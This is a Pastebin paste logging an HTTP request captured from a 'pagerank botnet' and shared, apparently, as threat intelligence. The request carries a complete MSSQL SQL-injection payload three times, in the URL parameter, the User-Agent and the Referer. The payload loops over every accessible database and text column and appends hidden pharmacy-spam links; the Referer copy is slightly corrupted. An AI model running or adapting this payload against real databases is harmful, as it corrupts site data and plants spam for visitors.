API tools faq
paste
Neonprimetime

pagerank botnet sql injection example

Neonprimetime
Jan 19th, 2016
186
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.25 KB | None | 0 0
raw download clone embed print report
  1. Pagerank botnet
  2. *******
  3. Source IP : 50.97.138.113
  4.  
  5. GET /page.aspx?id=6';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style="display:none"''+char(62)+''pharmacy discount coupons ''+char(60)+''a href="http:''+char(47)+char(47)+''aaamlog.com''+char(47)+''coupons"''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''click'''' when 1 then ''''aaamlog.com'''' else ''''aaamlog.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' walgreen printable coupon''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b-- HTTP/1.1
  6. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style="display:none">pharmacy discount coupons <a href="http://aaamlog.com/coupons">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''click'''' when 1 then ''''aaamlog.com'''' else ''''aaamlog.com'''' end +''''</a> walgreen printable coupon</div>'''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
  7. Referer: http://google.com';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select db_name() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',db_name());open @b;fetch next from @b into @w;while @@fetch_status=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+table_name+''] set [''+column_name+'']=[''+column_name+'']+case abs(checksum(newid()))%10 when 0 then ''''<div style="display:none">pharmacy discount coupons <a href="http:/aaamlog.com/coupons">''''+case abs(checksum(newid()))3 when 0 then ''''click'''' when 1 then ''''aaamlog.com'''' else ''''aaamlog.com'''' end +''''</a> walgreen printable coupon</div>'''' else '''''''' end'' from sysindexes as i inner join sysobjects as o on i.id=o.id inner join information_schema.columns on o.name=table_name where(indid in (0,1)) and data_type like ''varchar'' and(character_maximum_length in (2147483647,-1));open @c;fetch next from @c into @d;while @@fetch_status=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
  8. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  9. Accept-Encoding: gzip,deflate,gzip, deflate
  10. Connection: Keep-Alive
  11.  
  12. *******
  13. *******
  14. *******
  15. More FROM @neonprimetime security
  16.  
  17. http://pastebin.com/u/Neonprimetime
  18. https://www.virustotal.com/en/USER/neonprimetime/
  19. https://twitter.com/neonprimetime
  20. https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!